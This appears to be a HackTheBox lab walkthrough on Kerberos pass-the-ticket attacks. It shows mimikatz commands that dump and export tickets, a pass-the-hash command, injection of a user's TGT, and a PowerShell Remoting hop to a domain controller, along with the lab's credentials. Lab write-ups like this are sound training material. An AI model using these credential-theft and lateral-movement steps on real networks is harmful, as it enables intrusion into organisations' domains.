Pass the Ticket (PtT) from Windows

ℹ️ Informations¶

🌐 Website: HackTheBox
📚 Module: Password Attacks
🔗 Link: Pass the Ticket (PtT) from Windows

Provided Credentials: RDP to with user "Administrator" and password "AnotherC0mpl3xP4$$"

❓Question¶

Connect to the target machine using RDP and the provided creds. Export all tickets present on the computer. How many users TGT did you collect?

📋 Walkthrough¶

Let's connect with remmina or xfreerdp to the target.

PS C:\tools> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::tickets /export
<SNIP>
mimikatz # exit
Bye!
PS C:\tools> dir *.kirbi

TGT Tickets are the one with user and service krbtgt

Answer

3

❓Question¶

Use john's TGT to perform a Pass the Ticket attack and retrieve the flag from the shared folder \\DC01.inlanefreight.htb\john

📋 Walkthrough¶

sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:[ntlm]

Answer

[REDACTED]

❓Question¶

Use john's TGT to perform a Pass the Ticket attack and connect to the DC01 using PowerShell Remoting. Read the flag from C:\john\john.txt

📋 Walkthrough¶

We can follow module's istruction using mimikatz or rubeus to do this lateral movement.

PS C:\tools> .\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # kerberos::ptt "C:\tools\[0;49d09]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"

* File: 'C:\tools\[0;49d09]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi': OK

mimikatz # exit
Bye!
PS C:\tools> Enter-PPSession -ComputerName DC01
Enter-PPSession : The term 'Enter-PPSession' is not recognized as the name of a cmdlet,
function, script file, or operable program. Check the spelling of the name, or if a
path was included, verify that the path is correct and try again.
At line:1 char:1
+ Enter-PPSession -ComputerName DC01
+ ~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (Enter-PPSession:String) [], CommandNotFo
   undException
    + FullyQualifiedErrorId : CommandNotFoundException

PS C:\tools> Enter-PSSession -ComputerName DC01
[DC01]: PS C:\Users\john\Documents> whoami
inlanefreight\john

Answer

[REDACTED]